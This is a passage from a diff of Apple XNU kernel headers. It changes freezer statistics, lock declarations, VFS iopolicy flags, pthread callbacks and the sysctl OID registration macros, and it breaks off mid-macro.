+        * # of times that we saw memorystatus_available_pages <= memorystatus_freeze_threshold.
+        * Used to normalize skipped_full_count and shared_mb_high_count.
+        */
+       uint64_t mfs_below_threshold_count;
+
+       /* Skipped running the freezer because we were out of slots */
+       uint64_t mfs_skipped_full_count;
+
+       /* Skipped running the freezer because we were over the shared mb limit*/
+       uint64_t mfs_skipped_shared_mb_high_count;
+
+       /*
+        * How many pages have not been sent to swap because they were in a shared object?
+        * This is being used to gather telemtry so we can understand the impact we'd have
+        * on our NAND budget if we did swap out these pages.
+        */
+       uint64_t mfs_shared_pages_skipped;
+
+       /*
+        * A running sum of the total number of bytes sent to NAND during
+        * refreeze operations since boot.
+        */
+       uint64_t mfs_bytes_refrozen;
+       /* The number of refreeze operations since boot */
+       uint64_t mfs_refreeze_count;
+
+       /* The number of proceses which have been frozen at least once in the current interval. */
+       uint64_t mfs_processes_frozen;
+       /* THe number of processes which have been thawed at least once in the current interval. */
+       uint64_t mfs_processes_thawed;
+};
+extern struct memorystatus_freezer_stats_t memorystatus_freezer_stats;
+
 #endif /* CONFIG_FREEZE */
 
 #endif /* XNU_KERNEL_PRIVATE */
index 574ef7a706ddcecd7e037736cad775956322f7c6..8dc82f3132429b8bfc89703d5ff7c1a72e13cad2 100644 (file)
 struct vnop_advlock_args;
 struct vnode;
 
-#ifdef MALLOC_DECLARE
-MALLOC_DECLARE(M_LOCKF);
-#endif
-
 #if IMPORTANCE_INHERITANCE
 #define LF_NOT_BOOSTED  0
 #define LF_BOOSTED      1
index 4bf21625fc0e958af9b38a5dd301ec7fdd9254a0..62c2a4085f15e2999af5d3a4b2fe49c57b4fc59c 100644 (file)
@@ -144,6 +144,12 @@ ZONE_VIEW_DECLARE(ZV_NAMEI);
 
 #define M_LAST          129     /* Must be last type + 1 */
 
+/*
+ * If you need accounting consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_SHM          KHEAP_DEFAULT
+
 #define MALLOC(space, cast, size, type, flags)                      \
        ({ VM_ALLOC_SITE_STATIC(0, 0);                              \
        (space) = (cast)__MALLOC(size, type, flags, &site); })
index 0e8be447e685946c3d8ba9eaf8a14991564d841a..802e54672ac25eb68b7f1e06ab33a4ab8fb8fec3 100644 (file)
@@ -694,6 +694,9 @@ struct mbuf {
 /* checksum start adjustment has been done */
 #define CSUM_ADJUST_DONE        0x00020000
 
+/* VLAN encapsulation present */
+#define CSUM_VLAN_ENCAP_PRESENT    0x00040000      /* mbuf has vlan encapsulation */
+
 /* TCP Segment Offloading requested on this mbuf */
 #define CSUM_TSO_IPV4           0x00100000      /* This mbuf needs to be segmented by the NIC */
 #define CSUM_TSO_IPV6           0x00200000      /* This mbuf needs to be segmented by the NIC */
@@ -1079,6 +1082,7 @@ struct mbstat {
        u_int32_t       m_bigclusters;  /* clusters obtained from page pool */
        u_int32_t       m_bigclfree;    /* free clusters */
        u_int32_t       m_bigmclbytes;  /* length of an mbuf cluster */
+       u_int32_t       m_forcedefunct; /* times we force defunct'ed an app's sockets */
 };
 
 /* Compatibillity with 10.3 */
index 243965bd73810ae23d4301ba69cfc6f8715bedd5..4fd209c376f90b695f6dd2349ee61aadbda04f2e 100644 (file)
@@ -306,23 +306,17 @@ typedef struct mcache {
        u_int32_t       mc_nwretry_cnt; /* # of no-wait retry attempts */
        u_int32_t       mc_nwfail_cnt;  /* # of no-wait retries that failed */
        decl_lck_mtx_data(, mc_sync_lock); /* protects purges and reenables */
-       lck_attr_t      *mc_sync_lock_attr;
        lck_grp_t       *mc_sync_lock_grp;
-       lck_grp_attr_t  *mc_sync_lock_grp_attr;
        /*
         * Keep CPU and buckets layers lock statistics separate.
         */
-       lck_attr_t      *mc_cpu_lock_attr;
        lck_grp_t       *mc_cpu_lock_grp;
-       lck_grp_attr_t  *mc_cpu_lock_grp_attr;
 
        /*
         * Bucket layer common to all CPUs
         */
        decl_lck_mtx_data(, mc_bkt_lock);
-       lck_attr_t      *mc_bkt_lock_attr;
        lck_grp_t       *mc_bkt_lock_grp;
-       lck_grp_attr_t  *mc_bkt_lock_grp_attr;
        mcache_bkttype_t *cache_bkttype;        /* bucket type */
        mcache_bktlist_t mc_full;               /* full buckets */
        mcache_bktlist_t mc_empty;              /* empty buckets */
@@ -357,6 +351,8 @@ typedef struct mcache {
 
 #define MCA_TRN_MAX     2               /* Number of transactions to record */
 
+#define DUMP_MCA_BUF_SIZE       512
+
 typedef struct mcache_audit {
        struct mcache_audit *mca_next;  /* next audit struct */
        void            *mca_addr;      /* address of buffer */
@@ -404,7 +400,7 @@ __private_extern__ void mcache_audit_free_verify(mcache_audit_t *,
     void *, size_t, size_t);
 __private_extern__ void mcache_audit_free_verify_set(mcache_audit_t *,
     void *, size_t, size_t);
-__private_extern__ char *mcache_dump_mca(mcache_audit_t *);
+__private_extern__ char *mcache_dump_mca(char buf[DUMP_MCA_BUF_SIZE], mcache_audit_t *);
 __private_extern__ void mcache_audit_panic(mcache_audit_t *, void *, size_t,
     int64_t, int64_t) __abortlike;
 
index a6e093f59fdde9caef51063f6543e946641727e3..4ec0f06f3c14f66aa59ffd1ca085b1d39712ce70 100644 (file)
@@ -288,7 +288,6 @@ __END_DECLS
 #else   /* KERNEL */
 #ifdef XNU_KERNEL_PRIVATE
 void pshm_cache_init(void);     /* for bsd_init() */
-void pshm_lock_init(void);
 
 /*
  * XXX routine exported by posix_shm.c, but never used there, only used in
index 6ec648972d27b70dba500497c332bbae29b11bf5..bbf76690404f3e182b016e8cd7f9730e22d76663 100644 (file)
@@ -176,7 +176,7 @@ __BEGIN_DECLS
 #define MT_KDBG_TMPTH_START(CODE) MT_KDBG_TMPTH_(CODE, DBG_FUNC_START)
 #define MT_KDBG_TMPTH_END(CODE) MT_KDBG_TMPTH_(CODE, DBG_FUNC_END)
 
-extern lck_grp_t mt_lock_grp;
+extern lck_grp_t mt_lock_grp;
 
 int mt_dev_init(void);
 
index 6ff9616b358b5350916d3739a0f4fbaa9e0f91cf..f9b9a1480a364bfebb5f9bd8b7ab103b58e5110d 100644 (file)
@@ -1334,6 +1334,7 @@ void *  vfs_mntlabel(mount_t mp); /* Safe to cast to "struct label*"; returns "v
 void    vfs_setcompoundopen(mount_t mp);
 uint64_t vfs_throttle_mask(mount_t mp);
 int vfs_isswapmount(mount_t mp);
+int     vfs_context_dataless_materialization_is_prevented(vfs_context_t);
 boolean_t vfs_context_is_dataless_manipulator(vfs_context_t);
 boolean_t vfs_context_can_resolve_triggers(vfs_context_t);
 void    vfs_setmntsystem(mount_t mp);
index 2af3a1283cf4da20d8a6cdda50fc93a4553651d0..f3f0526a455ea92843c024b547fdda3d15e29993 100644 (file)
@@ -474,7 +474,7 @@ typedef uint32_t vfs_switch_root_flags_t;
 int vfs_switch_root(const char *, const char *, vfs_switch_root_flags_t);
 
 int     vfs_mountroot(void);
-void    vfs_unmountall(void);
+void    vfs_unmountall(int only_non_system);
 int     safedounmount(struct mount *, int, vfs_context_t);
 int     dounmount(struct mount *, int, int, vfs_context_t);
 void    dounmount_submounts(struct mount *, int, vfs_context_t);
@@ -502,6 +502,7 @@ void mount_iterreset(mount_t);
 #define KERNEL_MOUNT_PREBOOTVOL         0x20 /* mount the Preboot volume */
 #define KERNEL_MOUNT_RECOVERYVOL        0x40 /* mount the Recovery volume */
 #define KERNEL_MOUNT_BASESYSTEMROOT     0x80 /* mount a base root volume "instead of" the full root volume (only used during bsd_init) */
+#define KERNEL_MOUNT_DEVFS             0x100 /* kernel startup mount of devfs */
 
 /* mask for checking if any of the "mount volume by role" flags are set */
 #define KERNEL_MOUNT_VOLBYROLE_MASK (KERNEL_MOUNT_DATAVOL | KERNEL_MOUNT_VMVOL | KERNEL_MOUNT_PREBOOTVOL | KERNEL_MOUNT_RECOVERYVOL)
@@ -529,8 +530,6 @@ void rethrottle_thread(uthread_t ut);
 extern int num_trailing_0(uint64_t n);
 
 /* sync lock */
-extern lck_mtx_t * sync_mtx_lck;
-
 extern int sync_timeout_seconds;
 
 extern zone_t mount_zone;
index 43c30b05fe41901a4d26046df0c2adcfb5af6274..f714a61d9f00c71dd06704bd0da22f98aad5c91e 100644 (file)
@@ -169,6 +169,7 @@ void munge_wws(void *args);
 void munge_wwws(void *args);
 void munge_wwwsw(void *args);
 void munge_llllll(void *args);
+void munge_llll(void *args);
 void munge_l(void *args);
 void munge_ll(void *args);
 void munge_lw(void *args);
index 34c019cef334adfebf887dc027e0ac3586557b4e..dadd3349d4dc5c5cccfa7b1c7845c51216907e2e 100644 (file)
 #include <mach/coalition.h>             /* COALITION_NUM_TYPES */
 #endif
 
+#ifndef KERNEL
+#include <Availability.h>
+#endif
+
 #if defined(XNU_KERNEL_PRIVATE) || !defined(KERNEL)
 
 struct session;
@@ -410,6 +414,9 @@ extern boolean_t proc_is_translated(proc_t);
 /* true if the process ignores errors from content protection APIs */
 extern bool proc_ignores_content_protection(proc_t proc);
 
+/* true if the file system shouldn't update mtime for operations by the process */
+extern bool proc_skip_mtime_update(proc_t proc);
+
 /*!
  *  @function    proc_exitstatus
  *  @abstract    KPI to determine a process's exit status.
@@ -498,8 +505,10 @@ __BEGIN_DECLS
 
 int pid_suspend(int pid);
 int pid_resume(int pid);
-int task_inspect_for_pid(unsigned int target_tport, int pid, unsigned int *t);
-int task_read_for_pid(unsigned int target_tport, int pid, unsigned int *t);
+__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3))
+int task_inspect_for_pid(unsigned int target_tport, int pid, unsigned int *t);  /* Returns task inspect port */
+__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3))
+int task_read_for_pid(unsigned int target_tport, int pid, unsigned int *t);     /* Returns task read port */
 
 #if defined(__arm__) || defined(__arm64__)
 int pid_hibernate(int pid);
index 46a610413bc22b524a858e485fdf6d242673727c..4c6ceb04c76eb4550e5b3ae488f84101b0e4e088 100644 (file)
@@ -404,6 +404,7 @@ struct  proc {
        uint32_t          p_memstat_freeze_sharedanon_pages; /* shared pages left behind after freeze */
        uint32_t          p_memstat_frozen_count;
        uint32_t          p_memstat_thaw_count;
+       uint32_t          p_memstat_last_thaw_interval; /* In which freezer interval was this last thawed? */
 #endif /* CONFIG_FREEZE */
 #endif /* CONFIG_MEMORYSTATUS */
 
@@ -526,7 +527,10 @@ struct proc_ident {
 #define P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME            0x0008
 #define P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE          0x0010
 #define P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION        0x0020
-#define P_VFS_IOPOLICY_VALID_MASK                       (P_VFS_IOPOLICY_ATIME_UPDATES | P_VFS_IOPOLICY_FORCE_HFS_CASE_SENSITIVITY | P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES | P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME | P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE | P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION)
+#define P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS          0x0040
+#define P_VFS_IOPOLICY_SKIP_MTIME_UPDATE                                0x0080
+#define P_VFS_IOPOLICY_VALID_MASK                       (P_VFS_IOPOLICY_ATIME_UPDATES | P_VFS_IOPOLICY_FORCE_HFS_CASE_SENSITIVITY | P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES | P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME | \
+               P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE | P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION | P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS | P_VFS_IOPOLICY_SKIP_MTIME_UPDATE)
 
 /* process creation arguments */
 #define PROC_CREATE_FORK        0       /* independent child (running) */
@@ -690,8 +694,7 @@ extern unsigned int proc_shutdown_exitcount;
 
 #define PID_MAX         99999
 #define NO_PID          100000
-extern lck_mtx_t * proc_list_mlock;
-extern lck_mtx_t * proc_klist_mlock;
+extern lck_mtx_t proc_list_mlock;
 
 #define BSD_SIMUL_EXECS         33 /* 32 , allow for rounding */
 #define BSD_PAGEABLE_SIZE_PER_EXEC      (NCARGS + PAGE_SIZE + PAGE_SIZE) /* page for apple vars, page for executable header */
@@ -712,16 +715,15 @@ extern u_long pgrphash;
 extern LIST_HEAD(sesshashhead, session) * sesshashtbl;
 extern u_long sesshash;
 
-extern lck_grp_t * proc_lck_grp;
-extern lck_grp_t * proc_fdmlock_grp;
-extern lck_grp_t * proc_kqhashlock_grp;
-extern lck_grp_t * proc_knhashlock_grp;
-extern lck_grp_t * proc_mlock_grp;
-extern lck_grp_t * proc_ucred_mlock_grp;
-extern lck_grp_t * proc_slock_grp;
-extern lck_grp_t * proc_dirslock_grp;
-extern lck_grp_attr_t * proc_lck_grp_attr;
-extern lck_attr_t * proc_lck_attr;
+extern lck_attr_t proc_lck_attr;
+extern lck_grp_t proc_fdmlock_grp;
+extern lck_grp_t proc_lck_grp;
+extern lck_grp_t proc_kqhashlock_grp;
+extern lck_grp_t proc_knhashlock_grp;
+extern lck_grp_t proc_slock_grp;
+extern lck_grp_t proc_mlock_grp;
+extern lck_grp_t proc_ucred_mlock_grp;
+extern lck_grp_t proc_dirslock_grp;
 
 LIST_HEAD(proclist, proc);
 extern struct proclist allproc;         /* List of all processes. */
@@ -920,4 +922,10 @@ extern zone_t proc_sigacts_zone;
 
 extern struct proc_ident proc_ident(proc_t p);
 
+/*
+ * True if the process ignores file permissions in case it owns the
+ * file/directory
+ */
+bool proc_ignores_node_permissions(proc_t proc);
+
 #endif  /* !_SYS_PROC_INTERNAL_H_ */
index e956225b2e6350c11acea025595d2eaae722c9d8..1d28e90f95a6e7b69d052fb836e4883e1fc4da63 100644 (file)
@@ -202,7 +202,7 @@ typedef const struct pthread_callbacks_s {
 
        /* osfmk/vm/vm_map.h */
        kern_return_t (*vm_map_page_info)(vm_map_t map, vm_map_offset_t offset, vm_page_info_flavor_t flavor, vm_page_info_t info, mach_msg_type_number_t *count);
-       void *__unused_was_vm_map_switch;
+       mach_port_name_t (*ipc_port_copyout_send_pinned)(ipc_port_t sright, ipc_space_t space);
 
        /* wq functions */
        kern_return_t (*thread_set_wq_state32)(thread_t thread, thread_state_t state);
@@ -291,14 +291,14 @@ typedef const struct pthread_callbacks_s {
        uint16_t (*thread_set_tag)(thread_t thread, uint16_t tag);
        uint16_t (*thread_get_tag)(thread_t thread);
 
-       void *__unused_was_proc_usynch_thread_qos_squash_override_for_resource;
-       void *__unused_was_task_get_default_manager_qos;
-       void *__unused_was_thread_create_workq_waiting;
+       kern_return_t (*thread_create_pinned)(task_t parent_task, thread_t *new_thread);
+       kern_return_t (*thread_terminate_pinned)(thread_t thread);
+       ipc_port_t (*convert_thread_to_port_pinned)(thread_t th);
 
        user_addr_t (*proc_get_stack_addr_hint)(struct proc *p);
        void (*proc_set_stack_addr_hint)(struct proc *p, user_addr_t stack_addr_hint);
 
-       void *__unused_was_proc_get_return_to_kernel_offset;
+       kern_return_t (*thread_create_immovable)(task_t parent_task, thread_t *new_thread);
        void (*proc_set_return_to_kernel_offset)(struct proc *t, uint64_t offset);
 
        void *__unused_was_workloop_fulfill_threadreq;
index 08fcfd7acd51d71545db407cfa6193183f9d228b..cecc86d70739a823dce44dcd927ba98c4a0e7946 100644 (file)
@@ -353,7 +353,6 @@ void    dqfileclose(struct quotafile *, int);
 void    dqflush(struct vnode *);
 int     dqget(u_int32_t, struct quotafile *, int, struct dquot **);
 void    dqhashinit(void);
-void    dqinit(void);
 int     dqisinitialized(void);
 void    dqref(struct dquot *);
 void    dqrele(struct dquot *);
index b3baf8421439ca1f3b882063c46e8639ccd79b9b..e3b86028ae078a5c3f21f9ab0d897e574f5b5e4c 100644 (file)
@@ -547,6 +547,8 @@ struct proc_rlimit_control_wakeupmon {
 #define IOPOL_TYPE_VFS_STATFS_NO_DATA_VOLUME 4
 #define IOPOL_TYPE_VFS_TRIGGER_RESOLVE 5
 #define IOPOL_TYPE_VFS_IGNORE_CONTENT_PROTECTION 6
+#define IOPOL_TYPE_VFS_IGNORE_PERMISSIONS 7
+#define IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE 8
 
 /* scope */
 #define IOPOL_SCOPE_PROCESS   0
@@ -586,6 +588,12 @@ struct proc_rlimit_control_wakeupmon {
 #define IOPOL_VFS_CONTENT_PROTECTION_DEFAULT 0
 #define IOPOL_VFS_CONTENT_PROTECTION_IGNORE  1
 
+#define IOPOL_VFS_IGNORE_PERMISSIONS_OFF 0
+#define IOPOL_VFS_IGNORE_PERMISSIONS_ON  1
+
+#define IOPOL_VFS_SKIP_MTIME_UPDATE_OFF 0
+#define IOPOL_VFS_SKIP_MTIME_UPDATE_ON 1
+
 #ifdef PRIVATE
 /*
  * Structures for use in communicating via iopolicysys() between Libc and the
index a86f6f7654ef4da4016a596ba75d72e964e3e25d..2c3544bf8b6b886b39acc03f5577591bb7e5ca3a 100644 (file)
@@ -74,12 +74,6 @@ int              sbuf_done(struct sbuf *);
 void             sbuf_delete(struct sbuf *);
 #endif
 
-#ifdef KERNEL
-struct uio;
-struct sbuf     *sbuf_uionew(struct sbuf *, struct uio *, int *);
-int              sbuf_bcopyin(struct sbuf *, const void *, size_t);
-int              sbuf_copyin(struct sbuf *, const void *, size_t);
-#endif
 __END_DECLS
 
 #endif
index 2fb516833d8e02496ac847799a2cdf8a9bc8e9dc..27ad0c3c2dab1336031bbdb84c9fab03fa183939 100644 (file)
@@ -139,6 +139,10 @@ extern int selwait;
 void    selrecord(proc_t selector, struct selinfo *, void *);
 void    selwakeup(struct selinfo *);
 void    selthreadclear(struct selinfo *);
+#if XNU_KERNEL_PRIVATE
+struct _select;
+void    select_cleanup_uthread(struct _select *);
+#endif
 
 __END_DECLS
 
index b55852012d785179a378a4daf4a919e40cba9cac..7dc1085fd450e223da38b6647c43c42e53927c21 100644 (file)
@@ -62,7 +62,6 @@ int sem_wait(sem_t *) __DARWIN_ALIAS_C(sem_wait);
 __END_DECLS
 
 #else   /* KERNEL */
-void psem_lock_init(void);
 void psem_cache_init(void);
 #endif  /* KERNEL */
 
index c5124169af796285887e7b1ba8f11e42de35d67e..c1e66418741fdd9561eca1ff95da397d70f861fe 100644 (file)
@@ -85,6 +85,9 @@
 #include <sys/eventhandler.h>
 #endif /* BSD_KERNEL_PRIVATE */
 #endif /* KERNEL_PRIVATE */
+#if !KERNEL
+#include <TargetConditionals.h>
+#endif
 
 typedef u_quad_t so_gen_t;
 
@@ -433,7 +436,7 @@ struct  xsocket {
        uid_t                   so_uid;         /* XXX */
 };
 
-#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
+#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
 struct  xsocket64 {
        u_int32_t               xso_len;        /* length of this structure */
        u_int64_t               xso_so;         /* makes a convenient handle */
@@ -455,7 +458,7 @@ struct  xsocket64 {
        struct xsockbuf         so_snd;
        uid_t                   so_uid;         /* XXX */
 };
-#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
+#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
 
 #ifdef PRIVATE
 #define XSO_SOCKET      0x001
index 74a04166baa665bb3624086b7684897f6245a9bf..c686d328aeaba3eddb62bf889d7f13cc7a2441e2 100644 (file)
 #include <sys/time.h>
 #include <sys/ucred.h>
 #else
-#ifndef XNU_KERNEL_PRIVATE
+#ifdef XNU_KERNEL_PRIVATE
+#include <kern/startup.h>
+#include <libkern/section_keywords.h>
+#else
 #include <libkern/sysctl.h>
 #include <os/base.h>
-#endif
+#endif /* XNU_KERNEL_PRIVATE */
+#endif /* KERNEL */
 
-#endif
 #include <sys/proc.h>
 #include <sys/vm.h>
 
-#ifdef XNU_KERNEL_PRIVATE
-#include <sys/linker_set.h>
-#endif
-
 /*
  * Definitions for sysctl call.  The sysctl call uses a hierarchical name
  * for objects that can be examined or modified.  The name is expressed as
@@ -146,25 +145,29 @@ struct ctlname {
        int     ctl_type;       /* type of name */
 };
 
-#define CTLTYPE         0xf     /* Mask for the type */
-#define CTLTYPE_NODE    1       /* name is a node */
-#define CTLTYPE_INT     2       /* name describes an integer */
-#define CTLTYPE_STRING  3       /* name describes a string */
-#define CTLTYPE_QUAD    4       /* name describes a 64-bit number */
-#define CTLTYPE_OPAQUE  5       /* name describes a structure */
-#define CTLTYPE_STRUCT  CTLTYPE_OPAQUE  /* name describes a structure */
-
-#define CTLFLAG_RD      0x80000000      /* Allow reads of variable */
-#define CTLFLAG_WR      0x40000000      /* Allow writes to the variable */
-#define CTLFLAG_RW      (CTLFLAG_RD|CTLFLAG_WR)
-#define CTLFLAG_NOLOCK  0x20000000      /* XXX Don't Lock */
-#define CTLFLAG_ANYBODY 0x10000000      /* All users can set this var */
-#define CTLFLAG_SECURE  0x08000000      /* Permit set only if securelevel<=0 */
-#define CTLFLAG_MASKED  0x04000000      /* deprecated variable, do not display */
-#define CTLFLAG_NOAUTO  0x02000000      /* do not auto-register */
-#define CTLFLAG_KERN    0x01000000      /* valid inside the kernel */
-#define CTLFLAG_LOCKED  0x00800000      /* node will handle locking itself */
-#define CTLFLAG_OID2    0x00400000      /* struct sysctl_oid has version info */
+#define CTLTYPE             0xf             /* Mask for the type */
+#define CTLTYPE_NODE        1               /* name is a node */
+#define CTLTYPE_INT         2               /* name describes an integer */
+#define CTLTYPE_STRING      3               /* name describes a string */
+#define CTLTYPE_QUAD        4               /* name describes a 64-bit number */
+#define CTLTYPE_OPAQUE      5               /* name describes a structure */
+#define CTLTYPE_STRUCT      CTLTYPE_OPAQUE  /* name describes a structure */
+
+#define CTLFLAG_RD          0x80000000      /* Allow reads of variable */
+#define CTLFLAG_WR          0x40000000      /* Allow writes to the variable */
+#define CTLFLAG_RW          (CTLFLAG_RD|CTLFLAG_WR)
+#define CTLFLAG_NOLOCK      0x20000000      /* XXX Don't Lock */
+#define CTLFLAG_ANYBODY     0x10000000      /* All users can set this var */
+#define CTLFLAG_SECURE      0x08000000      /* Permit set only if securelevel<=0 */
+#define CTLFLAG_MASKED      0x04000000      /* deprecated variable, do not display */
+#define CTLFLAG_NOAUTO      0x02000000      /* do not auto-register */
+#define CTLFLAG_KERN        0x01000000      /* valid inside the kernel */
+#define CTLFLAG_LOCKED      0x00800000      /* node will handle locking itself */
+#define CTLFLAG_OID2        0x00400000      /* struct sysctl_oid has version info */
+#if XNU_KERNEL_PRIVATE
+#define CTLFLAG_PERMANENT   0x00200000      /* permanent sysctl_oid */
+#endif
+#define CTLFLAG_EXPERIMENT 0x00100000 /* Allows writing w/ the trial experiment entitlement. */
 
 /*
  * USE THIS instead of a hardwired number from the categories below
@@ -179,11 +182,22 @@ struct ctlname {
  * in I/O-Kit. In this case, you have to call sysctl_register_oid()
  * manually - just like in a KEXT.
  */
-#define OID_AUTO        (-1)
-#define OID_AUTO_START 100 /* conventional */
+#define OID_AUTO              (-1)
+#if XNU_KERNEL_PRIVATE
+/*
+ * Used to allow for most of the core kernel sysctl OIDs to be in immutable
+ * memory. The nodes that can be extensible have a fake first node with this
+ * particular oid_number which hangs a second mutable list from this node.
+ *
+ * This node is always first when it is used
+ */
+#define OID_MUTABLE_ANCHOR    (INT_MIN)
+#endif
+#define OID_AUTO_START        100 /* conventional */
 
 #ifdef KERNEL
-#define SYSCTL_HANDLER_ARGS (struct sysctl_oid *oidp, void *arg1, int arg2, \
+#define SYSCTL_HANDLER_ARGS \
+       (struct sysctl_oid *oidp __unused, void *arg1 __unused, int arg2 __unused, \
        struct sysctl_req *req)
 
 
@@ -286,7 +300,6 @@ int sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int
 void sysctl_register_oid(struct sysctl_oid *oidp);
 void sysctl_unregister_oid(struct sysctl_oid *oidp);
 
-void sysctl_load_devicetree_entries(void);
 #define nvram_osenvironment "osenvironment"
 void sysctl_set_osenvironment(unsigned int size, const void* value);
 void sysctl_unblock_osenvironment(void);
@@ -300,11 +313,6 @@ __END_DECLS
 #define SYSCTL_DECL(name)                                       \
        extern struct sysctl_oid_list sysctl_##name##_children
 
-#ifdef XNU_KERNEL_PRIVATE
-#define SYSCTL_LINKER_SET_ENTRY LINKER_SET_ENTRY
-#else
-#define SYSCTL_LINKER_SET_ENTRY(a, b)
-#endif
 /*
  * Macros to define sysctl entries.  Which to use?  Pure data that are
  * returned without modification, SYSCTL_<data type> is for you, like
@@ -334,65 +342,172 @@ __END_DECLS
 
 
 /* This constructs a "raw" MIB oid. */
-#define SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \
-       {                                                                                               \
-               &sysctl_##parent##_children, { NULL },                  \
-               nbr, (int)(kind|CTLFLAG_OID2), a1, (int)(a2), #name, handler, fmt, descr, SYSCTL_OID_VERSION, 0 \
+#define SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, fn, fmt, desc) {    \
+           .oid_parent     = &sysctl_##parent##_children,                      \
+           .oid_number     = nbr,                                              \
+           .oid_kind       = (int)(kind | CTLFLAG_OID2),                       \
+           .oid_arg1       = a1,                                               \
+           .oid_arg2       = (int)(a2),                                        \
+           .oid_name       = #name,                                            \
+           .oid_handler    = fn,                                               \
+           .oid_fmt        = fmt,                                              \
+           .oid_descr      = desc,                                             \
+           .oid_version    = SYSCTL_OID_VERSION,                               \
        }
 
+#define __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \
+       struct sysctl_oid sysctl_##parent##_##name = SYSCTL_STRUCT_INIT(\
+           parent, nbr, name, kind, a1, a2, handler, fmt, descr)
+
+#if XNU_KERNEL_PRIVATE
+
+/*
+ * Core kernel registers sysctls before lockdown and protects those entries
+ * in immutable memory.
+ *
+ * When a node needs to support dynamic extension after lockdown, it needs to be
+ * declared with SYSCTL_EXTENSIBLE_NODE() to insert a dummy "OID_MUTABLE_ANCHOR"
+ * node in this node chain which will allow extensibility.
+ *
+ * OIDs that are to be inserted dynamically based on system properties that
+ * aren't known at compile time, have three options, in increasing order of
+ * unsafety:
+ *
+ * - The OID can use the CTLFLAG_NOAUTO flag. Such entries aren't inserted to
+ *   the sysctl tree automatically but will be made read-only at lock down.
+ *
+ *   Such entries must be inserted in the STARTUP_SUB_SYSCTL "Middle" phase
+ *   using sysctl_register_oid_early().
+ *
+ * - The OID can be always registered and test whether it is ready to operate.
+ *   When it is not, it must return ENOENT which simulates an absent entry.
+ *
+ *   This however has the downside that the entry is still resolvable as an MIB
+ *   or listed in `sysctl -a` when it isn't masked.
+ *
+ *   This is acceptable for sysctls that will become valid quickly during boot
+ *   (but after lockdown).
+ *
+ * - SYSCTL_OID_MANUAL / SYSCTL_NODE_MANUAL can be used for completely
+ *   dynamic/manual oid registration. Such nodes must be registered with
+ *   sysctl_register_oid() after lockdown.
+ *
+ *   This is the least preferred solution.
+ */
+
+__BEGIN_DECLS
+void sysctl_register_oid_early(struct sysctl_oid *oidp);
+__END_DECLS
+
+#define SYSCTL_OID_MANUAL(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \
+       __XNU_PRIVATE_EXTERN                                                    \
+       __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr)
+
+#define SYSCTL_NODE_MANUAL(parent, nbr, name, access, handler, descr)           \
+       struct sysctl_oid_list sysctl_##parent##_##name##_children;             \
+       __XNU_PRIVATE_EXTERN                                                    \
+       __SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access,                    \
+           &sysctl_##parent##_##name##_children, 0, handler, "N", descr);
+
+#define SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr)        \
+       __security_const_late __XNU_PRIVATE_EXTERN                              \
+       __SYSCTL_OID(parent, nbr, name, CTLFLAG_PERMANENT|kind,                 \
+           a1, a2, handler, fmt, descr);                                       \
+       __STARTUP_ARG(sysctl_##parent, _##name,                                 \
+           SYSCTL, STARTUP_RANK_SECOND, sysctl_register_oid_early,             \
+           &sysctl_##parent##_##name)
+
+#define __SYSCTL_NODE(parent, nbr, name, access, handler, descr)                \
+       __security_const_late                                                   \
+       struct sysctl_oid_list sysctl_##parent##_##name##_children;             \
+       __security_const_late __XNU_PRIVATE_EXTERN                              \
+       __SYSCTL_OID(parent, nbr, name, CTLFLAG_PERMANENT|CTLTYPE_NODE|access,  \
+           &sysctl_##parent##_##name##_children, 0, handler, "N", descr);      \
+       __STARTUP_ARG(sysctl_##parent, _##name,                                 \
+           SYSCTL, STARTUP_RANK_FIRST, sysctl_register_oid_early,              \
+           &sysctl_##parent##_##name)
+
+#define __SYSCTL_EXTENSION_NODE(name)                                           \
+       static __security_read_write                                            \
+       struct sysctl_oid_list sysctl_##name##_children_mutable;                \
+       static __security_const_late                                            \
+       struct sysctl_oid sysctl_##name##_wranchor = {                          \
+           .oid_parent     = &sysctl_##name##_children,                        \
+           .oid_number     = OID_MUTABLE_ANCHOR,                               \
+           .oid_kind       = CTLFLAG_OID2 | CTLFLAG_PERMANENT,                 \
+           .oid_arg1       = &sysctl_##name##_children_mutable,                \
+           .oid_name       = "__anchor__(" #name ")",                          \
+           .oid_version    = SYSCTL_OID_VERSION,                               \
+       };                                                                      \
+       __STARTUP_ARG(sysctl_##name, _wranchor,                                 \
+           SYSCTL, STARTUP_RANK_LAST, sysctl_register_oid_early,               \
+           &sysctl_##name##_wranchor)
+
+#define SYSCTL_NODE(parent, nbr, name, access, handler, descr)                  \
+       __XNU_PRIVATE_EXTERN                                                    \
